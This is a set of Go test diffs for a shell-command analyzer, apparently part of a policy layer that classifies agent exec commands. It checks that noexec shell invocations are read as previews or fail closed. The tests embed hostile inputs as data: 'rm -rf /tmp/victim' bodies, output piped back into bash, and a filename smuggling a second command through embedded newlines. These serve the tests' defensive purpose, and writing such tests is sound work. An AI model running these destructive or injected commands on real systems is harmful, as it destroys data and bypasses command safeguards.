+			})
+			if facts.Parse.Status != StatusPartial || facts.Authoritative() ||
+				!containsIssue(facts.Parse.Issues, IssueOpaqueArtifact) ||
+				!factsHavePath(facts, PathAccessExecute, firstScript) ||
+				!factsHavePath(facts, PathAccessExecute, secondScript) ||
+				!factsHavePath(facts, PathAccessExecute, thirdScript) ||
+				factsHavePath(facts, PathAccessRead, firstScript) ||
+				factsHavePath(facts, PathAccessRead, secondScript) ||
+				factsHavePath(facts, PathAccessRead, thirdScript) {
+				t.Fatalf("pipelined noexec candidate set = %#v", facts)
+			}
+			signature := noExecScriptSemanticSignature(
+				facts,
+				firstScript,
+				secondScript,
+				thirdScript,
+			)
+			if baseline == "" {
+				baseline = signature
+			} else if signature != baseline {
+				t.Fatalf("order changed semantics: got %q want %q", signature, baseline)
+			}
+		})
+	}
+}
+
+func TestParsePOSIXNoExecCandidatesPreviewAsASet(t *testing.T) {
+	const (
+		firstScript  = "/tmp/first.sh"
+		secondScript = "/tmp/second.sh"
+	)
+	facts := Analyze(Input{
+		Tool: "exec",
+		Command: `bash -n ` + firstScript +
+			`; env sh -n ` + secondScript,
+		DialectHint: DialectPOSIX,
+	})
+	if !facts.Authoritative() || facts.Parse.Status != StatusComplete ||
+		!factsHavePath(facts, PathAccessRead, firstScript) ||
+		!factsHavePath(facts, PathAccessRead, secondScript) ||
+		factsHavePath(facts, PathAccessExecute, firstScript) ||
+		factsHavePath(facts, PathAccessExecute, secondScript) {
+		t.Fatalf("safe noexec candidates = %#v", facts)
+	}
+}
+
+func TestParsePOSIXNoExecScriptAndUnsafeCommandFailClosedAsASet(t *testing.T) {
+	const (
+		script    = "/tmp/safe.sh"
+		dangerous = "rm -rf /tmp/victim"
+		output    = "/tmp/parser-output"
+	)
+	commands := []string{
+		`bash -n ` + script,
+		`sh -n -c '` + dangerous + `' > ` + output,
+	}
+	baseline := ""
+	for _, order := range [][]int{{0, 1}, {1, 0}} {
+		order := order
+		t.Run(fmt.Sprintf("order_%d%d", order[0], order[1]), func(t *testing.T) {
+			facts := Analyze(Input{
+				Tool: "exec",
+				Command: strings.Join([]string{
+					commands[order[0]], commands[order[1]],
+				}, "; "),
+				DialectHint: DialectPOSIX,
+			})
+			if facts.Parse.Status != StatusPartial || facts.Authoritative() ||
+				!factsHavePath(facts, PathAccessExecute, script) ||
+				factsHavePath(facts, PathAccessRead, script) ||
+				hasExecutable(facts.Commands, "rm") ||
+				factsHavePath(facts, PathAccessDelete, "/tmp/victim") ||
+				!factsHavePath(facts, PathAccessWrite, output) {
+				t.Fatalf("mixed script/command noexec facts = %#v", facts)
+			}
+			noExecCommandExecute := false
+			for _, command := range facts.Commands {
+				invocation := parsePOSIXShellInvocation(command.Program, command.Argv)
+				noExecCommandExecute = noExecCommandExecute ||
+					invocation.valid && invocation.noExec &&
+						invocation.mode == posixShellModeCommand &&
+						command.Effect == EffectExecute
+			}
+			if !noExecCommandExecute {
+				t.Fatalf("unsafe noexec -c did not retain execute carrier: %#v", facts.Commands)
+			}
+			signature := noExecScriptSemanticSignature(facts, script)
+			if baseline == "" {
+				baseline = signature
+			} else if signature != baseline {
+				t.Fatalf("order changed semantics: got %q want %q", signature, baseline)
+			}
+		})
+	}
+}
+
+func TestParsePOSIXWrappedNoExecCandidatesFailClosedAsASet(t *testing.T) {
+	const (
+		firstScript  = "/tmp/first.sh"
+		secondScript = "/tmp/second.sh"
+		thirdScript  = "/tmp/third.sh"
+		output       = "/tmp/parser-output"
+	)
+	for _, test := range []struct {
+		name   string
+		source string
+	}{
+		{
+			name: "env ancestor unsafe",
+			source: `env bash -n ` + firstScript + ` > ` + output +
+				`; command -- sh -n ` + secondScript +
+				`; exec dash -n ` + thirdScript,
+		},
+		{
+			name: "command ancestor unsafe",
+			source: `env bash -n ` + firstScript +
+				`; command -- sh -n ` + secondScript + ` > ` + output +
+				`; exec dash -n ` + thirdScript,
+		},
+		{
+			name: "exec ancestor unsafe",
+			source: `env bash -n ` + firstScript +
+				`; command -- sh -n ` + secondScript +
+				`; exec dash -n ` + thirdScript + ` > ` + output,
+		},
+	} {
+		test := test
+		t.Run(test.name, func(t *testing.T) {
+			t.Parallel()
+			facts := Analyze(Input{
+				Tool: "exec", Command: test.source, DialectHint: DialectPOSIX,
+			})
+			if facts.Parse.Status != StatusPartial || facts.Authoritative() ||
+				!factsHavePath(facts, PathAccessExecute, firstScript) ||
+				!factsHavePath(facts, PathAccessExecute, secondScript) ||
+				!factsHavePath(facts, PathAccessExecute, thirdScript) ||
+				factsHavePath(facts, PathAccessRead, firstScript) ||
+				factsHavePath(facts, PathAccessRead, secondScript) ||
+				factsHavePath(facts, PathAccessRead, thirdScript) ||
+				!factsHavePath(facts, PathAccessWrite, output) {
+				t.Fatalf("wrapped noexec candidate set = %#v", facts)
+			}
+		})
+	}
+}
+
+func TestClassifyOutputLimitNeverMintsDeferredNoExecPreview(t *testing.T) {
+	const script = "/tmp/check.sh"
+	out := newParseOutput(DialectPOSIX, 1)
+	out.commands = append(out.commands, commandFromArgvAs(
+		out.nextCommandID(),
+		[]string{"bash", "-n", script},
+		DialectPOSIX,
+	))
+	out.paths = make([]PathFact, maxPathFacts)
+	classifyOutput(&out)
+	if out.status != StatusLimitExceeded ||
+		out.commands[0].Effect != EffectExecute ||
+		hasPathValue(out.paths, script) {
+		t.Fatalf("limit classification minted preview: %#v", out)
+	}
+}
+
+func TestClassifyPOSIXNoExecCandidateRejectsOutOfRangeScriptIndex(t *testing.T) {
+	for _, scriptIndex := range []int{-1, 3} {
+		scriptIndex := scriptIndex
+		t.Run(fmt.Sprintf("index_%d", scriptIndex), func(t *testing.T) {
+			out := newParseOutput(DialectPOSIX, 1)
+			command := commandFromArgvAs(
+				out.nextCommandID(),
+				[]string{"bash", "-n", "/tmp/check.sh"},
+				DialectPOSIX,
+			)
+			classifyPOSIXNoExecCandidate(
+				&out,
+				&command,
+				posixShellInvocation{
+					mode: posixShellModeScript, scriptIndex: scriptIndex,
+					noExec: true, recognized: true, valid: true,
+				},
+				true,
+			)
+			if out.status != StatusPartial || command.Effect != EffectExecute ||
+				len(out.paths) != 0 ||
+				!containsIssue(out.issues, IssueUnsupportedConstruct) {
+				t.Fatalf("out-of-range preview did not fail closed: command=%#v out=%#v", command, out)
+			}
+		})
+	}
+}
+
+func TestAnalyzeRevokesNoExecPreviewAfterFinalStatusDowngrade(t *testing.T) {
+	const script = "/tmp/check.sh"
+	for _, test := range []struct {
+		name  string
+		input Input
+	}{
+		{
+			name: "raw executes structured noexec",
+			input: Input{
+				Tool:        "exec",
+				Command:     `bash ` + script,
+				Argv:        []string{"bash", "-n", script},
+				DialectHint: DialectPOSIX,
+			},
+		},
+		{
+			name: "raw noexec structured executes",
+			input: Input{
+				Tool:        "exec",
+				Command:     `bash -n ` + script,
+				Argv:        []string{"bash", script},
+				DialectHint: DialectPOSIX,
+			},
+		},
+		{
+			name: "opaque tool arguments",
+			input: Input{
+				Tool:        "exec",
+				Argv:        []string{"bash", "-n", script},
+				Args:        []byte(`{"path":"/tmp/unmodelled"}`),
+				DialectHint: DialectPOSIX,
+			},
+		},
+		{
+			name: "conflicting extracted cwd",
+			input: Input{
+				Tool:        "exec",
+				Argv:        []string{"bash", "-n", script},
+				Args:        []byte(`{"cwd":"/elsewhere"}`),
+				CWD:         "/repo",
+				DialectHint: DialectPOSIX,
+			},
+		},
+	} {
+		test := test
+		t.Run(test.name, func(t *testing.T) {
+			t.Parallel()
+			facts := Analyze(test.input)
+			if facts.Parse.Status == StatusComplete || facts.Authoritative() ||
+				exactPOSIXNoExecPreviewCount(facts) != 0 ||
+				!factsHavePath(facts, PathAccessExecute, script) ||
+				factsHavePath(facts, PathAccessRead, script) ||
+				!containsIssue(facts.Parse.Issues, IssueOpaqueArtifact) {
+				t.Fatalf("non-authoritative noexec facts = %#v", facts)
+			}
+		})
+	}
+}
+
+func TestAnalyzeRevokesNoExecCommandPreviewWithoutExpandingBody(t *testing.T) {
+	const body = `rm -rf /tmp/victim`
+	facts := Analyze(Input{
+		Tool:        "exec",
+		Command:     `bash -c '` + body + `'`,
+		Argv:        []string{"bash", "-n", "-c", body},
+		DialectHint: DialectPOSIX,
+	})
+	if facts.Parse.Status == StatusComplete || facts.Authoritative() ||
+		exactPOSIXNoExecPreviewCount(facts) != 0 ||
+		hasExecutable(facts.Commands, "rm") ||
+		factsHavePath(facts, PathAccessDelete, "/tmp/victim") ||
+		!containsIssue(facts.Parse.Issues, IssueUnsupportedConstruct) {
+		t.Fatalf("non-authoritative noexec command facts = %#v", facts)
+	}
+}
+
+func TestFinalizePOSIXNoExecPreviewFailsClosedAtPathLimit(t *testing.T) {
+	const script = "/tmp/check.sh"
+	for _, test := range []struct {
+		name            string
+		includeReadPath bool
+		wantLimit       bool
+		wantExecutePath bool
+	}{
+		{
+			name:            "existing read is mutated without budget",
+			includeReadPath: true,
+			wantExecutePath: true,
+		},
+		{
+			name:      "missing read exhausts budget after revocation",
+			wantLimit: true,
+		},
+	} {
+		test := test
+		t.Run(test.name, func(t *testing.T) {
+			out := newParseOutput(DialectPOSIX, 1)
+			command := commandFromArgvAs(
+				out.nextCommandID(),
+				[]string{"bash", "-n", script},
+				DialectPOSIX,
+			)
+			command.Effect = EffectPreview
+			out.commands = append(out.commands, command)
+			out.paths = make([]PathFact, maxPathFacts)
+			if test.includeReadPath {
+				out.paths[len(out.paths)-1] = PathFact{
+					CommandID: command.ID,
+					Access:    PathAccessRead,
+					Flavor:    PathFlavorPOSIX,
+					Value:     script,
+				}
+			}
+			out.status = StatusPartial
+
+			finalizePOSIXNoExecPreviews(&out)
+
+			if out.commands[0].Effect != EffectExecute ||
+				containsExactPOSIXNoExecPreview(out.commands) ||
+				(out.status == StatusLimitExceeded) != test.wantLimit ||
+				hasPathAccessValue(out.paths, PathAccessExecute, script) !=
+					test.wantExecutePath ||
+				!containsIssue(out.issues, IssueOpaqueArtifact) {
+				t.Fatalf("finalized noexec limit facts = %#v", out)
+			}
+		})
+	}
+}
+
+func TestFinalizePOSIXNoExecPreviewRejectsEveryNonCompleteStatus(t *testing.T) {
+	const script = "/tmp/check.sh"
+	for _, status := range []ParseStatus{
+		StatusPartial,
+		StatusUnsupported,
+		StatusInvalid,
+		StatusLimitExceeded,
+		StatusAmbiguous,
+	} {
+		status := status
+		t.Run(string(status), func(t *testing.T) {
+			out := newParseOutput(DialectPOSIX, 1)
+			command := commandFromArgvAs(
+				out.nextCommandID(),
+				[]string{"bash", "-n", script},
+				DialectPOSIX,
+			)
+			command.Effect = EffectPreview
+			out.commands = append(out.commands, command)
+			out.paths = append(out.paths, PathFact{
+				CommandID: command.ID,
+				Access:    PathAccessRead,
+				Flavor:    PathFlavorPOSIX,
+				Value:     script,
+			})
+			out.status = status
+
+			finalizePOSIXNoExecPreviews(&out)
+
+			if out.commands[0].Effect != EffectExecute ||
+				containsExactPOSIXNoExecPreview(out.commands) ||
+				!hasPathAccessValue(out.paths, PathAccessExecute, script) ||
+				hasPathAccessValue(out.paths, PathAccessRead, script) ||
+				!containsIssue(out.issues, IssueOpaqueArtifact) {
+				t.Fatalf("status %s retained noexec preview: %#v", status, out)
+			}
+		})
+	}
+}
+
+func containsExactPOSIXNoExecPreview(commands []CommandFact) bool {
+	for index := range commands {
+		if commands[index].Effect != EffectPreview {
+			continue
+		}
+		if _, ok := exactPOSIXNoExecInvocation(&commands[index]); ok {
+			return true
+		}
+	}
+	return false
+}
+
+func hasPathAccessValue(paths []PathFact, access PathAccess, value string) bool {
+	for _, fact := range paths {
+		if fact.Access == access && fact.Value == value {
+			return true
+		}
+	}
+	return false
+}
+
 func TestParsePOSIXNoExecShellCommandPipelineStaysOpaque(t *testing.T) {
 	const dangerous = `rm -rf /tmp/victim`
 	for _, source := range []string{
@@ -841,6 +1404,11 @@ func TestPOSIXNoExecShellScriptRawStructuredWrapperParity(t *testing.T) {
 		argv []string
 	}{
 		{name: "bash", raw: `bash -n ` + script, argv: []string{"bash", "-n", script}},
+		{
+			name: "absolute bash",
+			raw:  `/usr/bin/bash -n ` + script,
+			argv: []string{"/usr/bin/bash", "-n", script},
+		},
 		{name: "bash verbose", raw: `bash -nv ` + script, argv: []string{"bash", "-nv", script}},
 		{name: "sh", raw: `sh -n ` + script, argv: []string{"sh", "-n", script}},
 		{name: "dash", raw: `dash -n ` + script, argv: []string{"dash", "-n", script}},
@@ -848,6 +1416,11 @@ func TestPOSIXNoExecShellScriptRawStructuredWrapperParity(t *testing.T) {
 			name: "env bash",
 			raw:  `env bash -n ` + script,
 			argv: []string{"env", "bash", "-n", script},
+		},
+		{
+			name: "absolute env bash",
+			raw:  `/usr/bin/env bash -n ` + script,
+			argv: []string{"/usr/bin/env", "bash", "-n", script},
 		},
 		{
 			name: "command sh",
@@ -897,6 +1470,121 @@ func TestPOSIXNoExecShellScriptRawStructuredWrapperParity(t *testing.T) {
 				len(raw.Commands) != len(structured.Commands) ||
 				len(raw.Paths) != len(structured.Paths) {
 				t.Fatalf("raw=%#v structured=%#v", raw, structured)
+			}
+		})
+	}
+}
+
+func TestPOSIXNoExecPreviewRequiresExactCaseSensitiveOwner(t *testing.T) {
+	const script = "/tmp/runner-cleanup.sh"
+	for _, test := range []struct {
+		name string
+		raw  string
+		argv []string
+	}{
+		{name: "mixed bare shell", raw: `Bash -n ` + script},
+		{name: "mixed shell basename", raw: `/usr/bin/Bash -n ` + script},
+		{name: "mixed shell directory", raw: `/USR/bin/bash -n ` + script},
+		{name: "mixed env wrapper", raw: `Env bash -n ` + script},
+		{name: "mixed env child", raw: `env Bash -n ` + script},
+		{name: "mixed command wrapper", raw: `Command -- sh -n ` + script},
+		{name: "mixed command child", raw: `command -- Sh -n ` + script},
+		{name: "mixed exec wrapper", raw: `Exec dash -n ` + script},
+		{name: "mixed exec child", raw: `exec Dash -n ` + script},
+		{name: "nested shell path", raw: `/usr/bin/fake/bash -n ` + script},
+		{name: "nested env path", raw: `/usr/bin/fake/env bash -n ` + script},
+		{
+			name: "nested command path",
+			raw:  `/usr/bin/fake/command -- sh -n ` + script,
+		},
+		{name: "nested exec path", raw: `/usr/bin/fake/exec dash -n ` + script},
+		{
+			name: "windows path in structured posix",
+			argv: []string{"c:/windows/system32/bash", "-n", script},
+		},
+	} {
+		test := test
+		t.Run(test.name, func(t *testing.T) {
+			t.Parallel()
+			input := Input{Tool: "exec", DialectHint: DialectPOSIX}
+			if test.raw != "" {
+				input.Command = test.raw
+			} else {
+				input.Argv = test.argv
+			}
+			facts := Analyze(input)
+			if facts.Parse.Status != StatusPartial || facts.Authoritative() ||
+				!containsIssue(facts.Parse.Issues, IssueOpaqueArtifact) ||
+				!factsHavePath(facts, PathAccessExecute, script) ||
+				factsHavePath(facts, PathAccessRead, script) {
+				t.Fatalf("mixed-case noexec owner facts = %#v", facts)
+			}
+			for _, command := range facts.Commands {
+				if len(command.Argv) > 0 && command.Argv[len(command.Argv)-1] == script &&
+					(command.Program == "bash" || command.Program == "sh" ||
+						command.Program == "dash") &&
+					command.Effect != EffectExecute {
+					t.Fatalf("mixed-case owner became preview: %#v", command)
+				}
+			}
+		})
+	}
+}
+
+func TestPOSIXNoExecShellCommandRawStructuredWrapperParity(t *testing.T) {
+	const body = "rm -rf /tmp/victim"
+	for _, test := range []struct {
+		name string
+		raw  string
+		argv []string
+	}{
+		{
+			name: "direct",
+			raw:  `bash -n -c '` + body + `'`,
+			argv: []string{"bash", "-n", "-c", body},
+		},
+		{
+			name: "env wrapper",
+			raw:  `env bash -n -c '` + body + `'`,
+			argv: []string{"env", "bash", "-n", "-c", body},
+		},
+		{
+			name: "command wrapper",
+			raw:  `command -- sh -n -c '` + body + `'`,
+			argv: []string{"command", "--", "sh", "-n", "-c", body},
+		},
+		{
+			name: "exec wrapper",
+			raw:  `exec dash -n -c '` + body + `'`,
+			argv: []string{"exec", "dash", "-n", "-c", body},
+		},
+	} {
+		test := test
+		t.Run(test.name, func(t *testing.T) {
+			t.Parallel()
+			for name, facts := range map[string]Facts{
+				"raw": Analyze(Input{
+					Tool: "exec", Command: test.raw, DialectHint: DialectPOSIX,
+				}),
+				"structured": Analyze(Input{
+					Tool: "exec", Argv: test.argv, DialectHint: DialectPOSIX,
+				}),
+			} {
+				if !facts.Authoritative() || facts.Parse.Status != StatusComplete ||
+					hasExecutable(facts.Commands, "rm") ||
+					factsHavePath(facts, PathAccessDelete, "/tmp/victim") ||
+					containsIssue(facts.Parse.Issues, IssueUnsupportedConstruct) {
+					t.Fatalf("%s noexec command facts = %#v", name, facts)
+				}
+				preview := false
+				for _, command := range facts.Commands {
+					preview = preview || command.Effect == EffectPreview &&
+						(command.Program == "bash" || command.Program == "sh" ||
+							command.Program == "dash")
+				}
+				if !preview {
+					t.Fatalf("%s lost noexec preview: %#v", name, facts.Commands)
+				}
 			}
 		})
 	}

--- a/internal/actionfacts/posix_test.go
+++ b/internal/actionfacts/posix_test.go
@@ -637,6 +637,11 @@ func TestParsePOSIXNoExecShellCommandIsPreviewOnly(t *testing.T) {
 		`bash -cn 'rm -rf /tmp/victim'`,
 		`bash +n -n -c 'rm -rf /tmp/victim'`,
 		`bash +o noexec -o noexec -c 'rm -rf /tmp/victim'`,
+		`bash -nv -c 'rm -rf /tmp/victim'`,
+		`bash --verbose -n -c 'rm -rf /tmp/victim'`,
+		`bash -o noexec -o verbose -c 'rm -rf /tmp/victim'`,
+		`sh -nv -c 'rm -rf /tmp/victim'`,
+		`dash -nv -c 'rm -rf /tmp/victim'`,
 	}
 	for _, source := range tests {
 		source := source
@@ -668,6 +673,235 @@ func TestParsePOSIXNoExecShellCommandIsPreviewOnly(t *testing.T) {
 	}
 }
 
+func TestParsePOSIXNoExecShellScriptIsPreviewOnly(t *testing.T) {
+	for _, test := range []struct {
+		source string
+		script string
+	}{
+		{source: `bash -n /tmp/runner-cleanup.sh`, script: "/tmp/runner-cleanup.sh"},
+		{source: `bash -n /tmp/runner-cleanup.sh +n`, script: "/tmp/runner-cleanup.sh"},
+		{
+			source: `bash -n /tmp/runner-cleanup.sh /tmp/test-e2e-full-stack.sh`,
+			script: "/tmp/runner-cleanup.sh",
+		},
+		{source: `bash -o noexec /tmp/runner-cleanup.sh`, script: "/tmp/runner-cleanup.sh"},
+		{source: `bash -nv /tmp/runner-cleanup.sh`, script: "/tmp/runner-cleanup.sh"},
+		{source: `bash --verbose -n /tmp/runner-cleanup.sh`, script: "/tmp/runner-cleanup.sh"},
+		{
+			source: `bash -o noexec -o verbose /tmp/runner-cleanup.sh`,
+			script: "/tmp/runner-cleanup.sh",
+		},
+		{source: `sh -n /tmp/runner-cleanup.sh`, script: "/tmp/runner-cleanup.sh"},
+		{source: `sh -nv /tmp/runner-cleanup.sh`, script: "/tmp/runner-cleanup.sh"},
+		{source: `dash -n /tmp/runner-cleanup.sh`, script: "/tmp/runner-cleanup.sh"},
+		{source: `dash -nv /tmp/runner-cleanup.sh`, script: "/tmp/runner-cleanup.sh"},
+		{source: `sh -n -- -c 'rm -rf /tmp/victim'`, script: "-c"},
+	} {
+		test := test
+		t.Run(test.source, func(t *testing.T) {
+			t.Parallel()
+
+			facts := Analyze(Input{
+				Tool:        "exec",
+				Command:     test.source,
+				DialectHint: DialectPOSIX,
+			})
+			if !facts.Authoritative() ||
+				facts.Parse.Status != StatusComplete ||
+				len(facts.Commands) != 1 ||
+				facts.Commands[0].Effect != EffectPreview ||
+				!factsHavePath(facts, PathAccessRead, test.script) ||
+				factsHavePath(facts, PathAccessExecute, test.script) ||
+				factsHavePath(facts, PathAccessRead, "/tmp/test-e2e-full-stack.sh") ||
+				facts.EnforcementEligible() {
+				t.Fatalf("no-exec shell script facts = %#v", facts)
+			}
+
+			projected := facts.EnforcementProjection()
+			if len(projected.Commands) != 0 ||
+				len(projected.Paths) != 0 ||
+				projected.EnforcementEligible() {
+				t.Fatalf("no-exec shell script projection = %#v", projected)
+			}
+		})
+	}
+}
+
+func TestParsePOSIXNoExecShellScriptReenableExecutes(t *testing.T) {
+	const script = "/tmp/runner-cleanup.sh"
+	for _, source := range []string{
+		`bash -n +n ` + script,
+		`bash -o noexec +o noexec ` + script,
+		`sh -n +n ` + script,
+		`dash -n +n ` + script,
+	} {
+		source := source
+		t.Run(source, func(t *testing.T) {
+			t.Parallel()
+
+			facts := Analyze(Input{
+				Tool:        "exec",
+				Command:     source,
+				DialectHint: DialectPOSIX,
+			})
+			if facts.Parse.Status != StatusPartial ||
+				len(facts.Commands) != 1 ||
+				facts.Commands[0].Effect != EffectExecute ||
+				!factsHavePath(facts, PathAccessExecute, script) ||
+				factsHavePath(facts, PathAccessRead, script) {
+				t.Fatalf("re-enabled shell script facts = %#v", facts)
+			}
+		})
+	}
+}
+
+func TestParsePOSIXNoExecShellScriptPipelineRemainsOpaque(t *testing.T) {
+	const script = "/tmp/bad\nprintf SAFE_FILENAME_MARKER\n#"
+	for _, test := range []struct {
+		name   string
+		source string
+	}{
+		{name: "bash", source: `bash -n '` + script + `' 2>/dev/stdout | bash`},
+		{name: "bash verbose", source: `bash -nv '` + script + `' 2>/dev/stdout | bash`},
+		{name: "sh", source: `sh -n '` + script + `' 2>/dev/stdout | bash`},
+		{name: "dash verbose", source: `dash -nv '` + script + `' 2>/dev/stdout | bash`},
+		{name: "env bash", source: `env bash -n '` + script + `' 2>/dev/stdout | bash`},
+		{name: "command sh", source: `command -- sh -n '` + script + `' 2>/dev/stdout | bash`},
+		{name: "exec dash", source: `exec dash -n '` + script + `' 2>/dev/stdout | bash`},
+		{name: "subshell", source: `(bash -n '` + script + `') 2>/dev/stdout | bash`},
+		{name: "block", source: `{ bash -n '` + script + `'; } 2>/dev/stdout | bash`},
+	} {
+		test := test
+		t.Run(test.name, func(t *testing.T) {
+			t.Parallel()
+			facts := Analyze(Input{
+				Tool: "exec", Command: test.source, DialectHint: DialectPOSIX,
+			})
+			if facts.Parse.Status != StatusPartial || facts.Authoritative() ||
+				!containsIssue(facts.Parse.Issues, IssueOpaqueArtifact) ||
+				!factsHavePath(facts, PathAccessExecute, script) ||
+				factsHavePath(facts, PathAccessRead, script) {
+				t.Fatalf("pipelined no-exec script facts = %#v", facts)
+			}
+		})
+	}
+}
+
+func TestParsePOSIXNoExecShellScriptBranchContextRemainsOpaque(t *testing.T) {
+	const script = "/tmp/runner-cleanup.sh"
+	for _, source := range []string{
+		`if true; then bash -n ` + script + `; fi`,
+		`while false; do bash -n ` + script + `; done`,
+	} {
+		source := source
+		t.Run(source, func(t *testing.T) {
+			t.Parallel()
+			facts := Analyze(Input{
+				Tool: "exec", Command: source, DialectHint: DialectPOSIX,
+			})
+			if facts.Parse.Status != StatusPartial || facts.Authoritative() ||
+				!containsIssue(facts.Parse.Issues, IssueOpaqueArtifact) ||
+				!factsHavePath(facts, PathAccessExecute, script) ||
+				factsHavePath(facts, PathAccessRead, script) {
+				t.Fatalf("compound no-exec script facts = %#v", facts)
+			}
+		})
+	}
+}
+
+func TestParsePOSIXNoExecShellCommandPipelineStaysOpaque(t *testing.T) {
+	const dangerous = `rm -rf /tmp/victim`
+	for _, source := range []string{
+		`bash -n -c '` + dangerous + `' 2>&1 | bash`,
+		`bash -nv -c '` + dangerous + `' 2>&1 | bash`,
+		`env bash -n -c '` + dangerous + `' 2>&1 | bash`,
+		`command -- sh -n -c '` + dangerous + `' 2>&1 | bash`,
+		`exec dash -nv -c '` + dangerous + `' 2>&1 | bash`,
+	} {
+		source := source
+		t.Run(source, func(t *testing.T) {
+			t.Parallel()
+			facts := Analyze(Input{
+				Tool: "exec", Command: source, DialectHint: DialectPOSIX,
+			})
+			if facts.Parse.Status != StatusPartial || facts.Authoritative() ||
+				hasExecutable(facts.Commands, "rm") ||
+				factsHavePath(facts, PathAccessDelete, "/tmp/victim") {
+				t.Fatalf("pipelined no-exec command facts = %#v", facts)
+			}
+		})
+	}
+}
+
+func TestPOSIXNoExecShellScriptRawStructuredWrapperParity(t *testing.T) {
+	const script = "/tmp/runner-cleanup.sh"
+	for _, test := range []struct {
+		name string
+		raw  string
+		argv []string
+	}{
+		{name: "bash", raw: `bash -n ` + script, argv: []string{"bash", "-n", script}},
+		{name: "bash verbose", raw: `bash -nv ` + script, argv: []string{"bash", "-nv", script}},
+		{name: "sh", raw: `sh -n ` + script, argv: []string{"sh", "-n", script}},
+		{name: "dash", raw: `dash -n ` + script, argv: []string{"dash", "-n", script}},
+		{
+			name: "env bash",
+			raw:  `env bash -n ` + script,
+			argv: []string{"env", "bash", "-n", script},
+		},
+		{
+			name: "command sh",
+			raw:  `command -- sh -n ` + script,
+			argv: []string{"command", "--", "sh", "-n", script},
+		},
+		{
+			name: "exec dash",
+			raw:  `exec dash -n ` + script,
+			argv: []string{"exec", "dash", "-n", script},
+		},
+	} {
+		test := test
+		t.Run(test.name, func(t *testing.T) {
+			t.Parallel()
+			raw := Analyze(Input{
+				Tool: "exec", Command: test.raw, DialectHint: DialectPOSIX,
+			})
+			structured := Analyze(Input{
+				Tool: "exec", Argv: test.argv, DialectHint: DialectPOSIX,
+			})
+			for name, facts := range map[string]Facts{
+				"raw": raw, "structured": structured,
+			} {
+				if !facts.Authoritative() ||
+					containsIssue(facts.Parse.Issues, IssueOpaqueArtifact) ||
+					!factsHavePath(facts, PathAccessRead, script) ||
+					factsHavePath(facts, PathAccessExecute, script) ||
+					factsHavePath(
+						facts.EnforcementProjection(),
+						PathAccessExecute,
+						script,
+					) {
+					t.Fatalf("%s facts = %#v", name, facts)
+				}
+				preview := false
+				for _, command := range facts.Commands {
+					preview = preview || command.Effect == EffectPreview &&
+						(command.Program == "bash" || command.Program == "sh" ||
+							command.Program == "dash")
+				}
+				if !preview {
+					t.Fatalf("%s lost shell preview: %#v", name, facts.Commands)
+				}
+			}
+			if raw.Parse.Status != structured.Parse.Status ||
+				len(raw.Commands) != len(structured.Commands) ||
+				len(raw.Paths) != len(structured.Paths) {
+				t.Fatalf("raw=%#v structured=%#v", raw, structured)
+			}
+		})
+	}
+}
+
 func TestParsePOSIXNoExecDoesNotSuppressOuterRedirect(t *testing.T) {
 	facts := Analyze(Input{
 		Tool: "exec",
@@ -675,18 +909,21 @@ func TestParsePOSIXNoExecDoesNotSuppressOuterRedirect(t *testing.T) {
 			`> /tmp/parser-output`,
 		DialectHint: DialectPOSIX,
 	})
-	if !facts.Authoritative() ||
+	if facts.Parse.Status != StatusPartial || facts.Authoritative() ||
 		len(facts.Commands) != 1 ||
-		facts.Commands[0].Effect != EffectPreview ||
+		facts.Commands[0].Effect != EffectExecute ||
+		hasExecutable(facts.Commands, "rm") ||
 		factsHavePath(facts, PathAccessDelete, "/tmp/victim") ||
 		!factsHavePath(facts, PathAccessWrite, "/tmp/parser-output") {
 		t.Fatalf("no-exec redirect facts = %#v", facts)
 	}
 
 	projected := facts.EnforcementProjection()
-	if !projected.EnforcementEligible() ||
+	if projected.EnforcementEligible() ||
 		len(projected.Commands) != 1 ||
-		projected.Commands[0].Kind != CommandKindShellRedirect ||
+		projected.Commands[0].Kind != CommandKindProcess ||
+		projected.Commands[0].Effect != EffectExecute ||
+		hasExecutable(projected.Commands, "rm") ||
 		factsHavePath(projected, PathAccessDelete, "/tmp/victim") ||
 		!factsHavePath(
 			projected,
@@ -729,8 +966,6 @@ func TestParsePOSIXNoExecPositionAndOpaqueInputsFailClosed(t *testing.T) {
 
 	for _, source := range []string{
 		`sh -n`,
-		`sh -n ./script.sh`,
-		`sh -n -- -c 'rm -rf /tmp/victim'`,
 	} {
 		source := source
 		t.Run(source, func(t *testing.T) {

--- a/internal/actionfacts/posix_test.go
+++ b/internal/actionfacts/posix_test.go
@@ -26,6 +26,7 @@ func noExecScriptSemanticSignature(facts Facts, scripts ...string) string {
 	for _, script := range scripts {
 		commandID := int64(0)
 		effect := CommandEffect("")
+		found := false
 		for _, command := range facts.Commands {
 			invocation := parsePOSIXShellInvocation(command.Program, command.Argv)
 			if invocation.valid && invocation.mode == posixShellModeScript &&
@@ -34,8 +35,13 @@ func noExecScriptSemanticSignature(facts Facts, scripts ...string) string {
 				command.Argv[invocation.scriptIndex] == script {
 				commandID = command.ID
 				effect = command.Effect
+				found = true
 				break
 			}
+		}
+		if !found {
+			fmt.Fprintf(&signature, " %s={owner:missing}", script)
+			continue
 		}
 		read := false
 		execute := false
@@ -56,6 +62,18 @@ func noExecScriptSemanticSignature(facts Facts, scripts ...string) string {
 		)
 	}
 	return signature.String()
+}
+
+func requireNoExecScriptOwners(t *testing.T, facts Facts, scripts ...string) {
+	t.Helper()
+	for _, script := range scripts {
+		if strings.Contains(
+			noExecScriptSemanticSignature(facts, script),
+			"{owner:missing}",
+		) {
+			t.Fatalf("no noexec command owns %q: %#v", script, facts.Commands)
+		}
+	}
 }
 
 func exactPOSIXNoExecPreviewCount(facts Facts) int {
@@ -903,6 +921,7 @@ func TestParsePOSIXNoExecPreviewUsesFinalClassificationStatus(t *testing.T) {
 					t.Fatalf("noexec sibling became preview: %#v", command)
 				}
 			}
+			requireNoExecScriptOwners(t, facts, script)
 			signature := noExecScriptSemanticSignature(facts, script)
 			if baseline == "" {
 				baseline = signature
@@ -951,6 +970,9 @@ func TestParsePOSIXNoExecCandidatesFailClosedAsASet(t *testing.T) {
 				!factsHavePath(facts, PathAccessWrite, output) {
 				t.Fatalf("mixed noexec candidates = %#v", facts)
 			}
+			requireNoExecScriptOwners(
+				t, facts, firstScript, secondScript, thirdScript,
+			)
 			signature := noExecScriptSemanticSignature(
 				facts,
 				firstScript,
@@ -1002,6 +1024,9 @@ func TestParsePOSIXNoExecPipelineCandidateFailsClosedAsASet(t *testing.T) {
 				factsHavePath(facts, PathAccessRead, thirdScript) {
 				t.Fatalf("pipelined noexec candidate set = %#v", facts)
 			}
